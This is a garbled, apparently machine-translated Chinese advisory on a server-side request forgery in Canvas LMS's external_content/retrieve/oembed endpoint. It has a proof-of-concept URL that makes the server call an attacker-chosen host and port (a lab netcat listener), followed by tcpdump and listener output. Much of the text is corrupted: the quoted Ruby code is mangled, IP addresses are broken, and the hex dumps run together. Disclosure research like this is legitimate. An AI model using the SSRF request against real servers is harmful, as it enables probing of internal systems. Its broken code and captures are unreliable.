服务器端请求伪易损性存在于/外部-content/retrieve/o远程非认证攻击者可利用此漏洞强制CanvasLMS应用执行HTTPGet请求任意域攻击者可能滥用此程序引导Canvas应用生成请求到其他 URL
缺陷存在于外部-content-contlerOmed-retre端点参数解析后传递到Canvashttp.getHTTPGet请求端点指定,url参数含有任意内容
defod_retriev端点=parmsss[:endpoint]url=parms[:url]urse=URI.parse+url='+CGI.escape/url+qformat=json'
下方我设置测试假想 证明概念
概念证明
CanvasLMS程序托管并搭建Netcat监听器此外,我开始tcpdump机主机Canvas
访问后
http://192.168.1.189/external_content/retrieve/oembed?endpoint=http://192.168.1.191:4444&url=scooby
web浏览器发现下列tcpdump输出
比特南米@debian:~$sudotcpdups3-Xtcp端口4444tcpdup:verbose输出抑制、使用-vv0x0010:c0a801bfd5c0x0020:a002f0efa80000020405b4002080a0x0030:ba802fb00000000000020:35:372197IP 192.168.1191444>192168.189180:Flagss[S.],后传38178782,ck 1677789,win6535选项[ms1460,nop,wscale6nop,nop,TSval52595089ecr3128961787,sackokkeee0x0010:c0a801bd115cf5c16c19b0x0020:b012ffe0x0030:0101080a1f5921f1b802fb040202035:37219805IP192168.189.57180>192.168.119144s.],cock1win502选项[nop,nop,TSval3128961787ecr5259089]0x0010:c0a801bfd5c0x0020:801001080a2fb0x0030:1f5921f20:35:37.220048IP1921.68.1191444>1921.68.1.89.71800x0010:c0a801bd115c5c16c19bb63a09e0x020:801080a0x0030:ba802afb.20:35:37.22051IP 192.168.1.89.57144:Flagss[P.]后写 1:176,ack1,win502选项[nop,nop,TSval3128961788eec 5259359]0x0010:c0a801bfd5c0x0020:80180180a2afc0x0030: 1f59 21f1 4745 5420 2f3f 7572 6c3d 7363 .Y!.GET./?url=sc 0x0040: 6f6f 6279 2666 6f72 6d61 743d 6a73 6f6e ooby&format=json 0x0050: 2048 5454 502f 312e 310d 0a41 6363 6570 .HTTP/1.1..Accep 0x0060: 742d 456e 636f 6469 6e67 3a20 677a 6970 t-Encoding:.gzip 0x0070: 3b71 3d31 2e30 2c64 6566 6c61 7465 3b71 ;q=1.0,deflate;q 0x0080: 3d30 2e36 2c69 6465 6e74 6974 793b 713d =0.6,identity;q= 0x0090: 302e 330d 0a41 6363 6570 743a 202a 2f2a 0.3..Accept:.*/* 0x00a0: 0d0a 5573 6572 2d41 6765 6e74 3a20 5275 ..User-Agent:.Ru 0x00b0: 6279 0d0a 436f 6e6e 6563 7469 6f6e 3a20 by..Connection:.0x00c0:636c6f73650d0a486f73743a20313932关闭.0x00e0:0d0a20:35:37.220841IP1921.68.1191444>192168.19.71800x0010:c0a80180a1f5921f20x0030:ba802afc
通知HTTP请求发送外出TCP端口4444至192.168.1191
以下是我Netcat监听器输出
sh-3.2$nc-lv 4444Get/?url=scoby&format=jsonHTTP/1.1接受编码:gzip;q=1.0,deflate;qq=0.6,身份性;q=0.3
注意值url参数可控允许攻击者发送含有任意消息的请求